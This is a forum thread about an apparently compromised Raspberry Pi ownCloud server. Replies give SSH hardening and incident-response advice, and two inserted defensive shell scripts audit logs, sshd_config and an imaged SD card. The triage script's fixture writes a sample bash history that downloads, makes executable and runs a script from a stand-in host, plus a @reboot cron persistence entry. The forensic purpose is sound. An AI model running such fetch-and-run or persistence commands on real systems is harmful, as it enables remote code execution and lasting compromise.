Owncloud server cracked


#1

Hi folks,

I've got a Pi that has been happily running my owncloud service for a few months. I also use it to allow SSH access to home so that I can access the rest of the house. I thought that I had secured it enough, with only the owncloud and SSH ports being allowed through my ASUS router/firewall.

I had SSH set up to use protocol 2 and only allow publickey authentication.

However, last week I tried to SSH in but it failed. I coupled up a screen to the HDMI and plugged in a keyboard but could not get the screen to power up.

I tried debugging the SSH and confirmed that that was working fine. It looks like BASH is crashing on start-up.

Then tonight while trying again I got the following displayed (most of the SSH stuff has been cropped):

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 7 16:30:44 2016 from 5.79.246.43
debug1: client_input_channel_req: channel 0 rtype exit-signal reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
debug1: channel 0: free: client-session, nchannels 1
Connection to 192.168.1.62 closed.

The problem I have is that I have no idea who is on IP address 5.79.246.43 but it certainly isn't me.

I've shut down the Pi and removed the SD card. My questions are:

1) have I been cracked? I'm pretty certain the answer is YES
2) is there any way I can tell how? Was it SSH or was it Owncloud?
3) is there any way to tell what they've done on my machine, how much they've accessed and if they've used it to access anyone else?
4) Once I build a new Owncloud from a new image, what do I need to do to make that one safe?


#2

Hi,

I think that is a far too complex topic to handle in here. There are companies / jobs doing such incident response and computer forensics, so you can see that's way too specific.

However you might be able to find some info on the net how to handle such situations:

https://mediatemple.net/community/products/dv/204644550/working-with-a-hacked-or-compromised-server


#3

Doesn't look that good: http://anti-hacker-alliance.com/index.php?ip=5.79.246.43


#4

You can configure your router to use a non standard port for ssh access, then port forward to your pi. /etc/ssh/ssh.config

Next set it to allow only users such as pi and yourusername as opposed to the default everyone.

Fail2ban and iptables set to scan your /var/log/auth

grep 'IP-address-of-intruder' /var/log/auth.log

I had many hits from Asia in my auth log until I sorted this method out for better security over ssh.

I hope this helps.

With port forwarding your new command to access the pi would be:
ssh -p33333 pi@yourip


#5

1) have I been cracked? I'm pretty certain the answer is YES

Looking at the IP you posted, from Russian Federation, I'd say it's conservative to assume you were hacked. At least, someone tried to gain access to your Pi.

2) is there any way I can tell how? Was it SSH or was it Owncloud?

Not without posting more logs here. SSH logs, apache logs, etc. Go through these and look for incidents. Better next time set up fail2ban. At least if someone tries the hard way (brute force or manual attempts), it will get banned for a period of time. I'm not a security expert, but access through SSH would be possible only on the port sshd is listening on for incoming connections. Please don't use standard ports (i.e. ssh=22). Use another random one. Disable root access from SSH. Create a dummy restricted user for SSH only, THEN escalate to root if REALLY necessary. IMO, root SSH should be disabled by default.

3) is there any way to tell what they've done on my machine, how much they've accessed and if they've used it to access anyone else?

IMO the best bet is looking into your server's logs for attempted connections to other hosts/machines and looking in your router/FW logs. Running an ASUS router will not protect you much. I highly recommend a pfSense appliance.

4) Once I build a new Owncloud from a new image, what do I need to do to make that one safe?

Not sure since we have very different topologies, but if it were me, I'd do these 5 things:

1-Customize everything (ports, settings, etc.) and avoid defaults (especially credentials!!!!)
2-Lock down everything you don't need and keep only minimal stuff open.
3-Get a better firewall or install a better firewall on your machine (firewalld, or iptables) and set up rkhunter+fail2ban
4-Segregate stuff. Don't host everything in the same machine/VM. If someone breaks in, they will have access to everything. If it's segregated, they will have a harder time accessing everything.
5-Last but not least, go through some Debian hardening tutorials and best practices.
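Posts #4 and #5 both come down to the same two chores: look in the auth log for the address that logged in, and make sure the rebuilt Pi's sshd_config has root login and password logins switched off with an explicit user allow-list. The script below is an added example, not code from anyone in this thread. It is plain POSIX sh for a Debian system; the log lines and the two sshd_config fragments are constructed samples (only the 5.79.246.43 address comes from the thread), and the file name /var/log/auth.log is where Debian actually writes SSH authentication records.

```shell
#!/bin/sh
# Added example: check an auth log for a given address and audit an
# sshd_config for the hardening recommended in posts #4 and #5.
# All sample data below is constructed for the demonstration.

# Constructed sample of /var/log/auth.log entries (Debian/rsyslog format).
SAMPLE_AUTH_LOG='Aug  7 16:30:44 pi sshd[1234]: Accepted publickey for pi from 5.79.246.43 port 51234 ssh2
Aug  7 16:30:44 pi sshd[1234]: pam_unix(sshd:session): session opened for user pi by (uid=0)
Aug  7 17:02:10 pi sshd[1300]: Failed password for root from 203.0.113.9 port 40022 ssh2
Aug  7 17:02:13 pi sshd[1300]: Failed password for root from 203.0.113.9 port 40022 ssh2
Aug  7 18:11:05 pi sshd[1400]: Accepted publickey for pi from 192.168.1.10 port 50001 ssh2'

# Constructed sshd_config fragments: a default-like one and a hardened one.
WEAK_SSHD_CONFIG='Port 22
PermitRootLogin yes
PasswordAuthentication yes'

HARDENED_SSHD_CONFIG='Port 33333
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowUsers pi yourusername'

# Write the samples to a scratch directory and print its path.
make_samples() {
    dir=$(mktemp -d)
    printf '%s\n' "$SAMPLE_AUTH_LOG" > "$dir/auth.log"
    printf '%s\n' "$WEAK_SSHD_CONFIG" > "$dir/sshd_config.weak"
    printf '%s\n' "$HARDENED_SSHD_CONFIG" > "$dir/sshd_config.hardened"
    echo "$dir"
}

# Every log line mentioning an address (the grep from post #4).
auth_lines_for_ip() {
    ip="$1"; log="${2:-/var/log/auth.log}"
    grep -F -- "$ip" "$log"
}

# Number of *successful* logins from an address: failed attempts are noise,
# accepted sessions are what show the intruder actually got in.
accepted_logins_from() {
    ip="$1"; log="${2:-/var/log/auth.log}"
    grep -F -- "from $ip " "$log" | grep -c 'Accepted ' || true
}

# Report hardening directives missing from an sshd_config file.
# Prints one line per finding; returns 1 if any control is missing.
audit_sshd_config() {
    cfg="$1"; rc=0
    # directive|required value|message
    for rule in 'PermitRootLogin|no|root login over SSH is still allowed' \
                'PasswordAuthentication|no|password logins still allowed (brute-forceable)' \
                'PubkeyAuthentication|yes|public-key authentication not set explicitly'; do
        key=${rule%%|*}; rest=${rule#*|}; want=${rest%%|*}; msg=${rest#*|}
        have=$(grep -E "^[[:space:]]*$key[[:space:]]" "$cfg" | tail -n 1 | awk '{print $2}')
        if [ "$have" != "$want" ]; then
            echo "$key: $msg (found '${have:-unset}')"
            rc=1
        fi
    done
    if ! grep -qE '^[[:space:]]*AllowUsers[[:space:]]' "$cfg"; then
        echo "AllowUsers: no user allow-list, every local account may log in"
        rc=1
    fi
    # Moving the port only cuts log noise (post #6); report it but do not fail on it.
    if grep -qE '^[[:space:]]*Port[[:space:]]+22$' "$cfg"; then
        echo "Port: still 22; a non-standard port reduces noise, it is not a security control"
    fi
    return $rc
}

SAMPLES=$(make_samples)
echo "== log lines mentioning 5.79.246.43 =="
auth_lines_for_ip 5.79.246.43 "$SAMPLES/auth.log"
echo "accepted logins from 5.79.246.43: $(accepted_logins_from 5.79.246.43 "$SAMPLES/auth.log")"
echo "== audit of the weak config =="
audit_sshd_config "$SAMPLES/sshd_config.weak" || echo "-> fix these in /etc/ssh/sshd_config, then restart sshd"
echo "== audit of the hardened config =="
audit_sshd_config "$SAMPLES/sshd_config.hardened" && echo "-> no findings"
```

On a live Pi, run `auth_lines_for_ip 5.79.246.43` with no second argument to read the real /var/log/auth.log, and point `audit_sshd_config` at /etc/ssh/sshd_config after editing it (sshd_config, not the ssh.config mentioned in post #4, which does not exist). Note that `accepted_logins_from` counts `Accepted publickey` lines too: a successful key login from an address you do not recognise is the stolen-key scenario post #6 raises, which no port change or fail2ban rule would have stopped.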


#6

If you configured that correctly, I think it is very unlikely that someone broke that. If someone manages to break in, he probably stole your key. Changing the default port only reduces the number of entries in your logfiles.

You can check the logfiles for hints, but consider that if the attacker had full access, it would be easy to tamper with these data. Bash history and the content of the /tmp folder can give indications. Keep an image of your SD card, then you can investigate anytime.

I consider SSH to be pretty secure, it's more likely your webserver or even a different service that was running on your server.

That is a good question. I suppose that you don't have very important data (such as Hillary's owncloud :smile:), so the hack was probably a quite obvious installation/configuration-problem ("low-hanging fruit"). A good and secure configuration should be your main focus. Use tools to verify the settings (check for running services with portscanner). You can follow guides for normal LAMP servers.
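Post #6's advice (image the card, then look at the bash history and /tmp) is an offline triage: you read the copied filesystem, never the running Pi, so the answers do not depend on binaries or logs the intruder may have replaced. The script below is an added example and not code from this thread. It assumes the card has been imaged and mounted read-only under some directory passed as `$ROOT`; the fake filesystem it builds is constructed sample data, and the device and image names in `image_sd_card` are placeholders.

```shell
#!/bin/sh
# Added example: offline triage of a copied SD card along the lines of post #6.
# All findings are read from a mounted copy ($ROOT), not from the live system.

# Image a card before touching it and hash the image so later work can prove
# the copy was not altered. Run as root; device and output are placeholders.
image_sd_card() {
    dev="$1"; out="$2"            # e.g. /dev/sdX and /srv/evidence/pi.img
    dd if="$dev" of="$out" bs=4M conv=noerror,sync
    sha256sum "$out" > "$out.sha256"
}

# Build a constructed fake root filesystem standing in for the mounted copy,
# plus a list of the keys the owner actually issued and a reference timestamp.
make_fixture() {
    work=$(mktemp -d); root="$work/root"
    mkdir -p "$root/home/pi/.ssh" "$root/tmp" "$root/var/spool/cron/crontabs"
    printf '%s\n' 'ls -la' 'cd /tmp' 'curl -o /tmp/x.sh http://example.invalid/x.sh' \
        'chmod +x /tmp/x.sh' '/tmp/x.sh' > "$root/home/pi/.bash_history"
    printf '%s\n' \
        'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedOwnerKey0000000000000000000000 owner@laptop' \
        'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedUnknownKey000000000000000 root@unknown' \
        > "$root/home/pi/.ssh/authorized_keys"
    printf '%s\n' \
        'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedOwnerKey0000000000000000000000 owner@laptop' \
        > "$work/known_keys.txt"
    printf '%s\n' '#!/bin/sh' 'echo constructed sample' > "$root/tmp/x.sh"
    printf '%s\n' '@reboot /tmp/x.sh' > "$root/var/spool/cron/crontabs/pi"
    touch -t 201601010000 "$work/ref"   # "last time I trusted this card"
    echo "$work"
}

# authorized_keys entries the owner does not recognise: compare the image's
# file against the list of keys you actually issued (stolen-key scenario).
unknown_authorized_keys() {
    root="$1"; known="$2"; user="${3:-pi}"
    grep -vxF -f "$known" "$root/home/$user/.ssh/authorized_keys" | grep -v '^[[:space:]]*$' || true
}

# Shell history from the image. A missing or empty history on an account that
# was clearly in use is itself a finding, so say so instead of printing nothing.
shell_history() {
    root="$1"; user="${2:-pi}"
    f="$root/home/$user/.bash_history"
    if [ ! -s "$f" ]; then
        echo "(no history for $user: missing or cleared)"
        return 0
    fi
    cat "$f"
}

# Leftovers in /tmp and per-user crontabs: common spots for dropped tooling
# and for persistence that survives a reboot.
dropped_files() {
    root="$1"
    find "$root/tmp" "$root/var/spool/cron/crontabs" -type f 2>/dev/null | sed "s|^$root||"
}

# Files modified after a reference file's timestamp (touch -t it to the last
# date you trust, e.g. your last update), printed with paths relative to the image.
modified_since() {
    root="$1"; ref="$2"
    find "$root" -type f -newer "$ref" | sed "s|^$root||"
}

triage() {
    root="$1"; known="$2"; ref="$3"
    echo "== authorized_keys entries you did not issue =="; unknown_authorized_keys "$root" "$known"
    echo "== shell history of pi =="; shell_history "$root"
    echo "== files in /tmp and crontabs =="; dropped_files "$root"
    echo "== files modified since reference =="; modified_since "$root" "$ref"
}

W=$(make_fixture)
triage "$W/root" "$W/known_keys.txt" "$W/ref"
```

Run `triage` against the real mount point once the image is attached read-only; the same functions work on the live card, but then an attacker with root could have altered exactly the files being read, which is the caveat post #6 makes about log tampering. For the "check for running services" step on the rebuilt Pi, `ss -tlnp` on the machine and `nmap` from another host show what is actually listening; anything beyond the owncloud and SSH ports is something to explain or remove.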